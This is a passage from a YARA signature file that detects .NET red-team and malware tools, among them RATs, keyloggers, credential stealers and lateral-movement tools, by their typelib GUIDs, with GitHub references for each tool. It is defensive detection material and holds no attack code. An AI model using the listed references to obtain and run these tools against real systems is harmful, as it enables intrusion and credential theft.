    $typelibguid4 = "97421325-b6d8-49e5-adf0-e2126abc17ee" ascii wide nocase
    $typelibguid5 = "06c247da-e2e1-47f3-bc3c-da0838a6df1f" ascii wide nocase
    $typelibguid6 = "fc700ac6-5182-421f-8853-0ad18cdbeb39" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_HiveJack {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Viralmaniar/HiveJack"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "e12e62fe-bea3-4989-bf04-6f76028623e3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DecryptAutoLogon {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/securesean/DecryptAutoLogon"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "015a37fc-53d0-499b-bffe-ab88c5086040" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_UnstoppableService {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/malcomvetter/UnstoppableService"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "0c117ee5-2a21-dead-beef-8cc7f0caaa86" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpWMI {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/GhostPack/SharpWMI"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_EWSToolkit {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rasta-mouse/EWSToolkit"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "ca536d67-53c9-43b5-8bc8-9a05fdc567ed" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SweetPotato {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/CCob/SweetPotato"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "6aeb5004-6093-4c23-aeae-911d64cacc58" ascii wide nocase
    $typelibguid1 = "1bf9c10f-6f89-4520-9d2e-aaf17d17ba5e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_memscan {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/nccgroup/memscan"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "79462f87-8418-4834-9356-8c11e44ce189" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpStay {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xthirteen/SharpStay"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "2963c954-7b1e-47f5-b4fa-2fc1f0d56aea" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpLocker {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Pickfordmatt/SharpLocker"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "a6f8500f-68bc-4efc-962a-6c6e68d893af" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SauronEye {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/vivami/SauronEye"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "0f43043d-8957-4ade-a0f4-25c1122e8118" ascii wide nocase
    $typelibguid1 = "086bf0ca-f1e4-4e8f-9040-a8c37a49fa26" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_sitrep {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/mdsecactivebreach/sitrep"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "12963497-988f-46c0-9212-28b4b2b1831b" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpClipboard {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/slyd0g/SharpClipboard"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "97484211-4726-4129-86aa-ae01d17690be" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpCookieMonster {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/m0rv4i/SharpCookieMonster"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "566c5556-1204-4db9-9dc8-a24091baaa8e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_p0wnedShell {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Cn33liz/p0wnedShell"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "2e9b1462-f47c-48ca-9d85-004493892381" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpMove {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xthirteen/SharpMove"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "8bf82bbe-909c-4777-a2fc-ea7c070ff43e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_C_Sharp_R_A_T_Client {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "6d9e8852-e86c-4e36-9cb4-b3c3853ed6b8" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpPrinter {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rvrsh3ll/SharpPrinter"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "41b2d1e5-4c5d-444c-aa47-629955401ed9" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_EvilFOCA {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/ElevenPaths/EvilFOCA"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "f26bdb4a-5846-4bec-8f52-3c39d32df495" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_PoshC2_Misc {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/nettitude/PoshC2_Misc"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "85773eb7-b159-45fe-96cd-11bad51da6de" ascii wide nocase
    $typelibguid1 = "9d32ad59-4093-420d-b45c-5fff391e990d" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Sharpire {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xbadjuju/Sharpire"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "39b75120-07fe-4833-a02e-579ff8b68331" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Sharp_SMBExec {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/checkymander/Sharp-SMBExec"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_MiscTools {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/rasta-mouse/MiscTools"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "384e9647-28a9-4835-8fa7-2472b1acedc0" ascii wide nocase
    $typelibguid1 = "d7ec0ef5-157c-4533-bbcd-0fe070fbf8d9" ascii wide nocase
    $typelibguid2 = "10085d98-48b9-42a8-b15b-cb27a243761b" ascii wide nocase
    $typelibguid3 = "6aacd159-f4e7-4632-bad1-2ae8526a9633" ascii wide nocase
    $typelibguid4 = "49a6719e-11a8-46e6-ad7a-1db1be9fea37" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_MemoryMapper {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jasondrawdy/MemoryMapper"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "b9fbf3ac-05d8-4cd5-9694-b224d4e6c0ea" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_VanillaRAT {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/DannyTheSloth/VanillaRAT"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "d0f2ee67-0a50-423d-bfe6-845da892a2db" ascii wide nocase
    $typelibguid1 = "a593fcd2-c8ab-45f6-9aeb-8ab5e20ab402" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_UnmanagedPowerShell {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/leechristensen/UnmanagedPowerShell"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "dfc4eebb-7384-4db5-9bad-257203029bd9" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Quasar {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/quasar/Quasar"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "cfda6d2e-8ab3-4349-b89a-33e1f0dab32b" ascii wide nocase
    $typelibguid1 = "c7c363ba-e5b6-4e18-9224-39bc8da73172" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpAdidnsdump {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/b4rtik/SharpAdidnsdump"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "cdb02bc2-5f62-4c8a-af69-acc3ab82e741" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DotNetToJScript {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/tyranid/DotNetToJScript"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "7e3f231c-0d0b-4025-812c-0ef099404861" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Inferno {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/LimerBoy/Inferno"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "26d498f7-37ae-476c-97b0-3761e3a919f0" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpSearch {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/djhohnstein/SharpSearch"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "98fee742-8410-4f20-8b2d-d7d789ab003d" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpSecDump {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/G0ldenGunSec/SharpSecDump"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "e2fdd6cc-9886-456c-9021-ee2c47cf67b7" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Net_GPPPassword {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/outflanknl/Net-GPPPassword"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "00fcf72c-d148-4dd0-9ca4-0181c4bd55c3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_FileSearcher {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/NVISO-BE/FileSearcher"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "2c879479-5027-4ce9-aaac-084db0e6d630" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ADFSDump {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/fireeye/ADFSDump"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "9ee27d63-6ac9-4037-860b-44e91bae7f0d" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpRDP {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/0xthirteen/SharpRDP"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "f1df1d0f-ff86-4106-97a8-f95aaf525c54" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpCall {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jhalon/SharpCall"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "c1b0a923-0f17-4bc8-ba0f-c87aff43e799" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ysoserial_net {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/pwntester/ysoserial.net"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "e1e8c029-f7cd-4bd1-952e-e819b41520f0" ascii wide nocase
    $typelibguid1 = "6b40fde7-14ea-4f57-8b7b-cc2eb4a25e6c" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ManagedInjection {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/malcomvetter/ManagedInjection"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "e5182bff-9562-40ff-b864-5a6b30c3b13b" ascii wide nocase
    $typelibguid1 = "fdedde0d-e095-41c9-93fb-c2219ada55b1" ascii wide nocase
    $typelibguid2 = "0dd00561-affc-4066-8c48-ce950788c3c8" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpSocks {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/nettitude/SharpSocks"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "2f43992e-5703-4420-ad0b-17cb7d89c956" ascii wide nocase
    $typelibguid1 = "86d10a34-c374-4de4-8e12-490e5e65ddff" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Sharp_WMIExec {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/checkymander/Sharp-WMIExec"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "0a63b0a1-7d1a-4b84-81c3-bbbfe9913029" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_KeeThief {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/GhostPack/KeeThief"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid1 = "39aa6f93-a1c9-497f-bad2-cc42a61d5710" ascii wide nocase
    $typelibguid3 = "3fca8012-3bad-41e4-91f4-534aa9a44f96" ascii wide nocase
    $typelibguid4 = "ea92f1e6-3f34-48f8-8b0a-f2bbc19220ef" ascii wide nocase
    $typelibguid5 = "c23b51c4-2475-4fc6-9b3a-27d0a2b99b0f" ascii wide nocase
    $typelibguid6 = "94432a8e-3e06-4776-b9b2-3684a62bb96a" ascii wide nocase
    $typelibguid7 = "80ba63a4-7d41-40e9-a722-6dd58b28bf7e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_fakelogonscreen {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/bitsadmin/fakelogonscreen"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "d35a55bd-3189-498b-b72f-dc798172e505" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_PoshSecFramework {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/PoshSec/PoshSecFramework"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "b1ac6aa0-2f1a-4696-bf4b-0e41cf2f4b6b" ascii wide nocase
    $typelibguid1 = "78bfcfc2-ef1c-4514-bce6-934b251666d2" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpAttack {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jaredhaight/SharpAttack"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "5f0ceca3-5997-406c-adf5-6c7fbb6cba17" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Altman {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/keepwn/Altman"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "64cdcd2b-7356-4079-af78-e22210e66154" ascii wide nocase
    $typelibguid1 = "f1dee29d-ca98-46ea-9d13-93ae1fda96e1" ascii wide nocase
    $typelibguid2 = "33568320-56e8-4abb-83f8-548e8d6adac2" ascii wide nocase
    $typelibguid3 = "470ec930-70a3-4d71-b4ff-860fcb900e85" ascii wide nocase
    $typelibguid4 = "9514574d-6819-44f2-affa-6158ac1143b3" ascii wide nocase
    $typelibguid5 = "0f3a9c4f-0b11-4373-a0a6-3a6de814e891" ascii wide nocase
    $typelibguid6 = "9624b72e-9702-4d78-995b-164254328151" ascii wide nocase
    $typelibguid7 = "faae59a8-55fc-48b1-a9b5-b1759c9c1010" ascii wide nocase
    $typelibguid8 = "37af4988-f6f2-4f0c-aa2b-5b24f7ed3bf3" ascii wide nocase
    $typelibguid9 = "c82aa2fe-3332-441f-965e-6b653e088abf" ascii wide nocase
    $typelibguid10 = "6e531f6c-2c89-447f-8464-aaa96dbcdfff" ascii wide nocase
    $typelibguid11 = "231987a1-ea32-4087-8963-2322338f16f6" ascii wide nocase
    $typelibguid12 = "7da0d93a-a0ae-41a5-9389-42eff85bb064" ascii wide nocase
    $typelibguid13 = "a729f9cc-edc2-4785-9a7d-7b81bb12484c" ascii wide nocase
    $typelibguid14 = "55a1fd43-d23e-4d72-aadb-bbd1340a6913" ascii wide nocase
    $typelibguid15 = "d43f240d-e7f5-43c5-9b51-d156dc7ea221" ascii wide nocase
    $typelibguid16 = "c2e6c1a0-93b1-4bbc-98e6-8e2b3145db8e" ascii wide nocase
    $typelibguid17 = "714ae6f3-0d03-4023-b753-fed6a31d95c7" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_BrowserPass {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/jabiel/BrowserPass"
    author = "Arnim Rupp"
    date = "2020-12-28"
  strings:
    $typelibguid0 = "3cb59871-0dce-453b-857a-2d1e515b0b66" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Mythic {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/its-a-feature/Mythic"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "91f7a9da-f045-4239-a1e9-487ffdd65986" ascii wide nocase
    $typelibguid1 = "0405205c-c2a0-4f9a-a221-48b5c70df3b6" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Nuages {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/p3nt4/Nuages"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "e9e80ac7-4c13-45bd-9bde-ca89aadf1294" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpSniper {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/HunnicCyber/SharpSniper"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "c8bb840c-04ce-4b60-a734-faf15abf7b18" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpHound3 {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/BloodHoundAD/SharpHound3"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "a517a8de-5834-411d-abda-2d0e1766539c" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_BlockEtw {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/Soledge/BlockEtw"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "daedf7b3-8262-4892-adc4-425dd5f85bca" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpWifiGrabber {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/r3nhat/SharpWifiGrabber"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "c0997698-2b73-4982-b25b-d0578d1323c2" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpMapExec {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/cube0x0/SharpMapExec"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "bd5220f7-e1fb-41d2-91ec-e4c50c6e9b9f" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_k8fly {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/zzwlpx/k8fly"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "13b6c843-f3d4-4585-b4f3-e2672a47931e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Stealer {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/malwares/Stealer"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "8fcd4931-91a2-4e18-849b-70de34ab75df" ascii wide nocase
    $typelibguid1 = "e48811ca-8af8-4e73-85dd-2045b9cca73a" ascii wide nocase
    $typelibguid2 = "d3d8a1cc-e123-4905-b3de-374749122fcf" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_PortTran {
  meta:
    description = "Detects c# red/black-team tools via typelibguid"
    reference = "https://github.com/k8gege/PortTran"
    author = "Arnim Rupp"
    date = "2020-12-29"
  strings:
    $typelibguid0 = "3a074374-77e8-4312-8746-37f3cb00e82c" ascii wide nocase
    $typelibguid1 = "67a73bac-f59d-4227-9220-e20a2ef42782" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_gray_keylogger_2 {
  meta:
    description = "Detects VB.NET red/black-team tools via typelibguid"
    reference = "https://github.com/graysuit/gray-keylogger-2"
    author = "Arnim Rupp"
    date = "2020-12-30"
  strings:
    $typelibguid0 = "e94ca3ff-c0e5-4d1a-ad5e-f6ebbe365067" ascii wide nocase
    $typelibguid1 = "1ed07564-b411-4626-88e5-e1cd8ecd860a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Lime_Miner {
  meta:
    description = "Detects VB.NET red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Lime-Miner"
    author = "Arnim Rupp"
    date = "2020-12-30"
  strings:
    $typelibguid0 = "13958fb9-dfc1-4e2c-8a8d-a5e68abdbc66" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_BlackNET {
  meta:
    description = "Detects VB.NET red/black-team tools via typelibguid"
    reference = "https://github.com/BlackHacker511/BlackNET"
    author = "Arnim Rupp"
    date = "2020-12-30"
  strings:
    $typelibguid0 = "c2b90883-abee-4cfa-af66-dfd93ec617a5" ascii wide nocase
    $typelibguid1 = "8bb6f5b4-e7c7-4554-afd1-48f368774837" ascii wide nocase
    $typelibguid2 = "983ae28c-91c3-4072-8cdf-698b2ff7a967" ascii wide nocase
    $typelibguid3 = "9ac18cdc-3711-4719-9cfb-5b5f2d51fd5a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_PlasmaRAT {
  meta:
    description = "Detects VB.NET red/black-team tools via typelibguid"
    reference = "https://github.com/mwsrc/PlasmaRAT"
    author = "Arnim Rupp"
    date = "2020-12-30"
  strings:
    $typelibguid0 = "b8a2147c-074c-46e1-bb99-c8431a6546ce" ascii wide nocase
    $typelibguid1 = "0fcfde33-213f-4fb6-ac15-efb20393d4f3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Lime_RAT {
  meta:
    description = "Detects VB.NET red/black-team tools via typelibguid"
    reference = "https://github.com/NYAN-x-CAT/Lime-RAT"
    author = "Arnim Rupp"
    date = "2020-12-30"
  strings:
    $typelibguid0 = "e58ac447-ab07-402a-9c96-95e284a76a8d" ascii wide nocase
    $typelibguid1 = "8fb35dab-73cd-4163-8868-c4dbcbdf0c17" ascii wide nocase
    $typelibguid2 = "37845f5b-35fe-4dce-bbec-2d07c7904fb0" ascii wide nocase
    $typelibguid3 = "83c453cf-0d29-4690-b9dc-567f20e63894" ascii wide nocase
    $typelibguid4 = "8b1f0a69-a930-42e3-9c13-7de0d04a4add" ascii wide nocase
    $typelibguid5 = "eaaeccf6-75d2-4616-b045-36eea09c8b28" ascii wide nocase
    $typelibguid6 = "5b2ec674-0aa4-4209-94df-b6c995ad59c4" ascii wide nocase
    $typelibguid7 = "e2cc7158-aee6-4463-95bf-fb5295e9e37a" ascii wide nocase
    $typelibguid8 = "d04ecf62-6da9-4308-804a-e789baa5cc38" ascii wide nocase
    $typelibguid9 = "8026261f-ac68-4ccf-97b2-3b55b7d6684d" ascii wide nocase
    $typelibguid10 = "212cdfac-51f1-4045-a5c0-6e638f89fce0" ascii wide nocase
    $typelibguid11 = "c1b608bb-7aed-488d-aa3b-0c96625d26c0" ascii wide nocase
    $typelibguid12 = "4c84e7ec-f197-4321-8862-d5d18783e2fe" ascii wide nocase
    $typelibguid13 = "3fc17adb-67d4-4a8d-8770-ecfd815f73ee" ascii wide nocase
